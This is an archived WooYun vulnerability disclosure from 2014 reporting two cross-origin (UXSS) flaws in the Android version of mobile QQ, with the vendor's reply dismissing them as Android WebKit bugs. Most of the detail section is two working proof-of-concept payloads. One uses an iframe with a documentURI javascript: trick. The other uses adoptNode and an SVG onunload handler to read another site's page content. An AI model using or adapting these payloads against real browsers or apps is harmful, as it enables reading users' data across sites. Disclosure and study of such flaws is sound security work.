当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068174

漏洞标题:手机QQ安卓版两处跨域问题

相关厂商:腾讯

漏洞作者: 瘦蛟舞

提交时间:2014-07-11 14:15

修复时间:2014-10-06 14:16

公开时间:2014-10-06 14:16

漏洞类型:用户敏感数据泄漏

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-11: 细节已通知厂商并且等待厂商处理中
2014-07-11: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-09-04: 细节向核心白帽子及相关领域专家公开
2014-09-14: 细节向普通白帽子公开
2014-09-24: 细节向实习白帽子公开
2014-10-06: 细节向公众公开

简要描述:

手机qq安卓版两处跨域问题

详细说明:

POC1

<body> 
<script>
i = document.body.appendChild(document.createElement("iframe"));
i.src = "http://m.baidu.com";
i.onload = function()
{
document.documentURI = "javascript://hostname.com/%0D%0Aalert('OH HAI ' + location)";
i.contentWindow.location = "";
}
</script>
</body>


Screenshot_2014-07-08-11-58-30.png

漏洞证明:

POC2
test.html

<head>
<script>
main = function()
{
specialFrame = document.body.appendChild(document.createElement("iframe"));
document.adoptNode(specialFrame);
document.implementation.createHTMLDocument().adoptNode(specialFrame);
specialFrame.contentWindow.location = "http://www.baidu.com/";
interval1 = setInterval(function() {
if (specialFrame.contentDocument)
return;
clearInterval(interval1);
specialFrame.src = "javascript:alert(document.body.innerHTML)";
uxssFrame = document.body.appendChild(document.createElement("iframe"));
uxssFrame.src = "test.svg";
}, 100);
}
</script>
</head>
<body onload="main()"></body>


test.svg

<svg xmlns="http://www.w3.org/2000/svg">
<script>
svg = document.documentElement;
frame = svg.appendChild(document.createElementNS("http://www.w3.org/1999/xhtml", "iframe"));
frame.contentWindow.onunload = function() {
svg.appendChild(top.specialFrame);
}
</script>
<element param="1" param="2"/>
</svg>


Screenshot_2014-07-10-11-53-53.png

修复方案:

求解决方案

版权声明:转载请注明来源 瘦蛟舞@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-06 14:16

厂商回复:

非常感谢您的报告,此问题属于andriod webkit的漏洞,请尽量使用最新版的andriod系统。

最新状态:

暂无